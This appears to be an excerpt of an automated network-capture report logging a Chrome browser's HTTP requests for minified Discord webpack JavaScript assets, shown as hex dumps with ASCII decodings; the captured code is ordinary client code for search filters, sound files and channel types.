                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 65 28 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 6c 65 74 20 65 3d 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 53 65 74 28 69 2e 72 61 6e 67 65 28 32 30 31 35 2c 65 2b 31 29 2e 6d 61 70 28 65 3d 3e 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 2c 74 29 7b 72 65 74 75 72 6e 5b 65 2c 65 2e 63 6c 6f 6e 65 28 29 2e 61 64 64 28 31 2c 74 29 5d 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 30 2c 6e 3d 63 28 29 2e 73 74 61 72 74 4f 66 28 65 29 2e 61 64 64 28 74 2c 65 29 3b 72 65
                                                                          Data Ascii: e()))}function I(){let e=new Date().getFullYear();return new Set(i.range(2015,e+1).map(e=>e.toString()))}function C(e,t){return[e,e.clone().add(1,t)]}function M(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,n=c().startOf(e).add(t,e);re
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 68 61 73 28 6c 29 3f 5b 6e 2c 72 5d 3d 4c 28 6c 2c 22 59 59 59 59 22 2c 22 79 65 61 72 22 29 3a 5b 6e 2c 72 5d 3d 4c 28 6c 2c 41 2e 53 45 41 52 43 48 5f 44 41 54 45 5f 46 4f 52 4d 41 54 2c 22 64 61 79 22 29 3b 6c 65 74 20 75 3d 6e 2e 69 73 56 61 6c 69 64 28 29 26 26 72 2e 69 73 56 61 6c 69 64 28 29 3b 72 65 74 75 72 6e 21 21 75 26 26 28 22 62 65 66 6f 72 65 22 3d 3d 3d 74 3f 28 72 3d 6e 2c 6e 3d 6e 75 6c 6c 29 3a 22 61 66 74 65 72 22 3d 3d 3d 74 26 26 28 6e 3d 72 2c 72 3d 6e 75 6c 6c 29 2c 65 2e 73 65 74 44 61 74 61 28 22 73 74 61 72 74 22 2c 6e 29 2c 65 2e 73 65 74 44 61 74 61 28 22 65 6e 64 22 2c 72 29 2c 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 6c 65 74 20 74 3d 65 2e 67 65 74 4d 61 74 63 68 28 31 29 2c 6e 3d 54 2e 64 65 66 61 75 6c 74 2e
                                                                          Data Ascii: has(l)?[n,r]=L(l,"YYYY","year"):[n,r]=L(l,A.SEARCH_DATE_FORMAT,"day");let u=n.isValid()&&r.isValid();return!!u&&("before"===t?(r=n,n=null):"after"===t&&(n=r,r=null),e.setData("start",n),e.setData("end",r),!0)}function b(e){let t=e.getMatch(1),n=T.default.
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 69 28 6e 29 2e 66 69 6c 74 65 72 28 65 3d 3e 75 28 72 2c 65 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 29 29 2e 74 61 6b 65 28 74 29 2e 6d 61 70 28 65 3d 3e 28 7b 74 65 78 74 3a 65 7d 29 29 2e 76 61 6c 75 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 2c 74 29 7b 6c 65 74 20 6e 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 31 30 2c 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 33 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 33 5d 2c 61 3d 5f 2e 64 65 66 61 75 6c 74 2e 67 65
                                                                          Data Ascii: caleLowerCase();return i(n).filter(e=>u(r,e.toLocaleLowerCase())).take(t).map(e=>({text:e})).value()}function B(e,t){let n,r=arguments.length>2&&void 0!==arguments[2]?arguments[2]:10,l=arguments.length>3&&void 0!==arguments[3]&&arguments[3],a=_.default.ge
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 67 65 78 3a 6b 28 4e 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 45 41 52 43 48 5f 46 49 4c 54 45 52 5f 46 52 4f 4d 29 2c 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 3a 22 46 49 4c 54 45 52 22 2c 6b 65 79 3a 4f 28 4e 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 45 41 52 43 48 5f 46 49 4c 54 45 52 5f 46 52 4f 4d 29 2c 76 61 6c 69 64 61 74 6f 72 3a 71 2c 67 65 74 41 75 74 6f 63 6f 6d 70 6c 65 74 69 6f 6e 73 3a 42 7d 2c 5b 41 2e 53 65 61 72 63 68 54 6f 6b 65 6e 54 79 70 65 73 2e 41 4e 53 57 45 52 5f 55 53 45 52 4e 41 4d 45 5f 46 52 4f 4d 5d 3a 7b 66 6f 6c 6c 6f 77 73 3a 5b 41 2e 53 65 61 72 63 68 54 6f 6b 65 6e 54 79 70 65 73 2e 46 49 4c 54 45 52 5f 46 52 4f 4d 5d 2c 72 65 67 65 78 3a 4b 2c 76 61 6c 69 64 61 74 6f 72 3a 77 2c 6d 75 74 61
                                                                          Data Ascii: gex:k(N.default.Messages.SEARCH_FILTER_FROM),componentType:"FILTER",key:O(N.default.Messages.SEARCH_FILTER_FROM),validator:q,getAutocompletions:B},[A.SearchTokenTypes.ANSWER_USERNAME_FROM]:{follows:[A.SearchTokenTypes.FILTER_FROM],regex:K,validator:w,muta
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 71 75 65 72 79 4b 65 79 3a 22 61 74 74 61 63 68 6d 65 6e 74 5f 65 78 74 65 6e 73 69 6f 6e 73 22 7d 2c 5b 41 2e 53 65 61 72 63 68 54 6f 6b 65 6e 54 79 70 65 73 2e 46 49 4c 54 45 52 5f 46 49 4c 45 5f 4e 41 4d 45 5d 3a 7b 72 65 67 65 78 3a 6b 28 4e 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 45 41 52 43 48 5f 46 49 4c 54 45 52 5f 46 49 4c 45 5f 4e 41 4d 45 29 2c 6b 65 79 3a 4f 28 4e 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 45 41 52 43 48 5f 46 49 4c 54 45 52 5f 46 49 4c 45 5f 4e 41 4d 45 29 2c 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 3a 22 46 49 4c 54 45 52 22 7d 2c 5b 41 2e 53 65 61 72 63 68 54 6f 6b 65 6e 54 79 70 65 73 2e 41 4e 53 57 45 52 5f 46 49 4c 45 5f 4e 41 4d 45 5d 3a 7b 72 65 67 65 78 3a 2f 28 3f 3a 5c 73 2a 28 5b 5e 5c
                                                                          Data Ascii: queryKey:"attachment_extensions"},[A.SearchTokenTypes.FILTER_FILE_NAME]:{regex:k(N.default.Messages.SEARCH_FILTER_FILE_NAME),key:O(N.default.Messages.SEARCH_FILTER_FILE_NAME),componentType:"FILTER"},[A.SearchTokenTypes.ANSWER_FILE_NAME]:{regex:/(?:\s*([^\


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          321192.168.2.550056162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:19 UTC866OUTGET /assets/53526.ad1fa7caed5e70d3ddc2.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=NtVlIpD02s2867zysSi1z_tayCu1R0dio23.m.ONvKQ-1702226718645-0-604800000
                                                                          2023-12-10 16:45:19 UTC1128INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 31 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 32 33 35 62 63 62 30 33 31 38 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:19 GMTContent-Type: application/javascriptContent-Length: 54170Connection: closeCF-Ray: 8336f5235bcb0318-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:19 UTC241INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 33 35 32 36 22 5d 2c 7b 38 39 34 30 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 7b 22 2e 2f 61 63 74 69 76 69 74 69 65 73 2d 72 6f 63 6b 65 74 2d 74 69 6d 65 2e 6d 70 33 22 3a 22 33 32 39 31 36 30 22 2c 22 2e 2f 61 63 74 69 76 69 74 79 5f 65 6e 64 2e 6d 70 33 22 3a 22 33 37 36 33 34 33 22 2c 22 2e 2f 61 63 74 69 76 69 74 79 5f 6c 61 75 6e 63 68 2e 6d 70 33 22 3a 22 38 36 35 38 31 34 22 2c 22 2e 2f 61 63 74 69 76 69 74 79 5f 75 73 65 72 5f 6a 6f 69 6e 2e 6d 70 33 22 3a 22
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["53526"],{89400:function(e,t,n){var i={"./activities-rocket-time.mp3":"329160","./activity_end.mp3":"376343","./activity_launch.mp3":"865814","./activity_user_join.mp3":"
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 34 34 37 37 34 22 2c 22 2e 2f 61 63 74 69 76 69 74 79 5f 75 73 65 72 5f 6c 65 66 74 2e 6d 70 33 22 3a 22 39 36 34 39 32 39 22 2c 22 2e 2f 63 61 6c 6c 5f 63 61 6c 6c 69 6e 67 2e 6d 70 33 22 3a 22 33 32 35 39 36 22 2c 22 2e 2f 63 61 6c 6c 5f 72 69 6e 67 69 6e 67 2e 6d 70 33 22 3a 22 31 37 33 34 34 37 22 2c 22 2e 2f 63 61 6c 6c 5f 72 69 6e 67 69 6e 67 5f 62 65 61 74 2e 6d 70 33 22 3a 22 39 34 32 30 34 34 22 2c 22 2e 2f 63 61 6c 6c 5f 72 69 6e 67 69 6e 67 5f 68 61 6c 6c 6f 77 65 65 6e 2e 6d 70 33 22 3a 22 37 30 37 37 34 36 22 2c 22 2e 2f 63 6c 69 70 5f 65 72 72 6f 72 2e 6d 70 33 22 3a 22 39 33 33 35 37 34 22 2c 22 2e 2f 63 6c 69 70 5f 73 61 76 65 2e 6d 70 33 22 3a 22 33 39 33 36 38 36 22 2c 22 2e 2f 64 64 72 2d 64 6f 77 6e 2e 6d 70 33 22 3a 22 34 39 37 34 35
                                                                          Data Ascii: 44774","./activity_user_left.mp3":"964929","./call_calling.mp3":"32596","./call_ringing.mp3":"173447","./call_ringing_beat.mp3":"942044","./call_ringing_halloween.mp3":"707746","./clip_error.mp3":"933574","./clip_save.mp3":"393686","./ddr-down.mp3":"49745
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 32 31 35 37 22 2c 22 2e 2f 70 6f 67 67 65 72 6d 6f 64 65 5f 61 63 68 69 65 76 65 6d 65 6e 74 5f 75 6e 6c 6f 63 6b 2e 6d 70 33 22 3a 22 35 33 37 33 39 30 22 2c 22 2e 2f 70 6f 67 67 65 72 6d 6f 64 65 5f 61 70 70 6c 61 75 73 65 2e 6d 70 33 22 3a 22 38 32 39 37 31 39 22 2c 22 2e 2f 70 6f 67 67 65 72 6d 6f 64 65 5f 65 6e 61 62 6c 65 64 2e 6d 70 33 22 3a 22 39 38 38 38 32 36 22 2c 22 2e 2f 70 6f 67 67 65 72 6d 6f 64 65 5f 6d 65 73 73 61 67 65 5f 73 65 6e 64 2e 6d 70 33 22 3a 22 33 30 35 34 35 36 22 2c 22 2e 2f 70 74 74 5f 73 74 61 72 74 2e 6d 70 33 22 3a 22 31 35 38 37 32 22 2c 22 2e 2f 70 74 74 5f 73 74 6f 70 2e 6d 70 33 22 3a 22 31 34 34 38 32 31 22 2c 22 2e 2f 72 65 63 6f 6e 6e 65 63 74 2e 6d 70 33 22 3a 22 31 31 30 32 37 36 22 2c 22 2e 2f 72 6f 62 6f 74 5f
                                                                          Data Ascii: 2157","./poggermode_achievement_unlock.mp3":"537390","./poggermode_applause.mp3":"829719","./poggermode_enabled.mp3":"988826","./poggermode_message_send.mp3":"305456","./ptt_start.mp3":"15872","./ptt_stop.mp3":"144821","./reconnect.mp3":"110276","./robot_
                                                                          2023-12-10 16:45:19 UTC38INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74
                                                                          Data Ascii: :function(e,t,n){"use strict";e.export
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 73 3d 6e 2e 70 2b 22 31 33 33 39 62 35 64 31 64 35 35 33 66 34 30 61 63 32 62 63 2e 6d 70 33 22 7d 2c 37 30 37 37 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 65 31 39 63 63 33 32 32 39 38 62 32 39 31 62 65 36 62 33 64 2e 6d 70 33 22 7d 2c 39 33 33 35 37 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 34 36 65 63 66 39 37 64 32 31 64 65 66 30 32 64 35 38 35 66 2e 6d 70 33 22 7d 2c 33 39 33 36 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 36 30 37 66 34 66 35 38 33 30 66 63 31 33
                                                                          Data Ascii: s=n.p+"1339b5d1d553f40ac2bc.mp3"},707746:function(e,t,n){"use strict";e.exports=n.p+"e19cc32298b291be6b3d.mp3"},933574:function(e,t,n){"use strict";e.exports=n.p+"46ecf97d21def02d585f.mp3"},393686:function(e,t,n){"use strict";e.exports=n.p+"607f4f5830fc13
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 37 30 61 30 31 38 34 65 63 35 30 39 65 63 32 37 37 30 36 32 2e 6d 70 33 22 7d 2c 38 38 37 38 32 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 63 62 38 65 35 65 62 64 37 38 32 33 35 33 64 34 31 66 38 33 2e 6d 70 33 22 7d 2c 32 30 33 37 38 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 36 64 32 66 64 61 62 36 38 62 33 65 36 64 39 37 39 31 34 66 2e 6d 70 33 22 7d 2c 31 31 38 34 37 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72
                                                                          Data Ascii: ction(e,t,n){"use strict";e.exports=n.p+"70a0184ec509ec277062.mp3"},887823:function(e,t,n){"use strict";e.exports=n.p+"cb8e5ebd782353d41f83.mp3"},203788:function(e,t,n){"use strict";e.exports=n.p+"6d2fdab68b3e6d97914f.mp3"},118472:function(e,t,n){"use str
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 62 39 31 65 65 34 61 65 64 62 35 34 65 35 35 35 2e 6d 70 33 22 7d 2c 33 30 32 35 30 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 37 65 39 35 65 34 31 37 65 36 64 65 63 66 39 31 34 35 39 61 2e 6d 70 33 22 7d 2c 34 35 38 31 36 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 64 39 38 62 33 63 62 35 37 35 36 61 30 63 34 39 30 38 61 62 2e 6d 70 33 22 7d 2c 34 33 36 38 31 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 62 38 66 62 64 35 62 63 61 65 64 33 64 35 31 62 38 62 37 33 2e 6d 70 33 22
                                                                          Data Ascii: b91ee4aedb54e555.mp3"},302509:function(e,t,n){"use strict";e.exports=n.p+"7e95e417e6decf91459a.mp3"},458161:function(e,t,n){"use strict";e.exports=n.p+"d98b3cb5756a0c4908ab.mp3"},436814:function(e,t,n){"use strict";e.exports=n.p+"b8fbd5bcaed3d51b8b73.mp3"
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 32 31 35 63 32 33 62 31 38 61 35 32 39 37 39 33 62 30 63 33 2e 6d 70 33 22 7d 2c 38 37 39 37 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 32 32 30 30 38 37 30 35 39 63 65 65 35 39 64 65 36 35 33 37 2e 6d 70 33 22 7d 2c 39 39 30 31 36 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 61 33 33 38 65 36 32 36 32 34 30 31 33 61 32 30 66 37 64 66 2e 6d 70 33 22 7d 2c 32 31 36 36 33 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74
                                                                          Data Ascii: {"use strict";e.exports=n.p+"215c23b18a529793b0c3.mp3"},87973:function(e,t,n){"use strict";e.exports=n.p+"220087059cee59de6537.mp3"},990161:function(e,t,n){"use strict";e.exports=n.p+"a338e62624013a20f7df.mp3"},216636:function(e,t,n){"use strict";e.export
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 74 49 64 28 29 29 7b 6c 65 74 20 65 3d 73 2e 64 65 66 61 75 6c 74 2e 67 65 74 41 63 74 69 76 69 74 69 65 73 28 74 29 2e 66 69 6e 64 28 65 3d 3e 65 2e 74 79 70 65 3d 3d 3d 66 2e 41 63 74 69 76 69 74 79 54 79 70 65 73 2e 50 4c 41 59 49 4e 47 29 3b 72 65 74 75 72 6e 7b 73 6f 75 72 63 65 4e 61 6d 65 3a 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 6e 61 6d 65 2c 73 6f 75 72 63 65 41 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 7d 7d 7d 6c 65 74 20 75 3d 61 2e 64 65 66 61 75 6c 74 2e 67 65 74 53 74 72 65 61 6d 65 72 41 63 74 69 76 65 53 74 72 65 61 6d 4d 65 74 61 64 61 74 61 28 29 2c 72 3d 6e 75 6c 6c 3d 3d 75 3f 76 6f 69 64 20 30 3a 75 2e 70 69 64 2c 6f 3d 6e 75 6c 6c
                                                                          Data Ascii: tId()){let e=s.default.getActivities(t).find(e=>e.type===f.ActivityTypes.PLAYING);return{sourceName:null==e?void 0:e.name,sourceApplicationId:null==e?void 0:e.application_id}}}let u=a.default.getStreamerActiveStreamMetadata(),r=null==u?void 0:u.pid,o=null


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          322192.168.2.550058162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:19 UTC865OUTGET /assets/7273.c6fee0df510188855fd0.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=SnUkM2Xw8Smv7qi2thG48IP2IGKF_yXwbqUJZsjCd1c-1702226718722-0-604800000
                                                                          2023-12-10 16:45:19 UTC1127INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 37 32 31 32 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 32 33 38 66 38 30 36 64 64 33 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:19 GMTContent-Type: application/javascriptContent-Length: 472128Connection: closeCF-Ray: 8336f5238f806dd3-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:19 UTC242INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 32 37 33 22 5d 2c 7b 34 39 31 31 31 3a 66 75 6e 63 74 69 6f 6e 28 5f 2c 45 2c 52 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 52 2e 72 28 45 29 2c 52 2e 64 28 45 2c 7b 43 68 61 6e 6e 65 6c 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 46 2e 43 68 61 6e 6e 65 6c 54 79 70 65 73 7d 2c 4d 65 73 73 61 67 65 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 76 2e 4d 65 73 73 61 67 65 54 79 70 65 73 7d 2c 43 68 61 6e 6e 65 6c 54 79 70 65 73 53 65 74 73 3a
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["7273"],{49111:function(_,E,R){"use strict";R.r(E),R.d(E,{ChannelTypes:function(){return IF.ChannelTypes},MessageTypes:function(){return Iv.MessageTypes},ChannelTypesSets:
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 46 2e 43 68 61 6e 6e 65 6c 54 79 70 65 73 53 65 74 73 7d 2c 4d 65 73 73 61 67 65 45 6d 62 65 64 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 57 2e 4d 65 73 73 61 67 65 45 6d 62 65 64 54 79 70 65 73 7d 2c 53 75 62 73 63 72 69 70 74 69 6f 6e 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 5a 2e 53 75 62 73 63 72 69 70 74 69 6f 6e 54 79 70 65 73 7d 2c 4c 6f 67 69 6e 53 74 61 74 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 4c 6f 67 69 6e 4d 65 74 68 6f 64 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 2c 52 65 67 69 73 74 72 61 74 69 6f 6e 53 74 61 74 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                          Data Ascii: function(){return IF.ChannelTypesSets},MessageEmbedTypes:function(){return IW.MessageEmbedTypes},SubscriptionTypes:function(){return IZ.SubscriptionTypes},LoginStates:function(){return a},LoginMethods:function(){return I},RegistrationStates:function(){ret
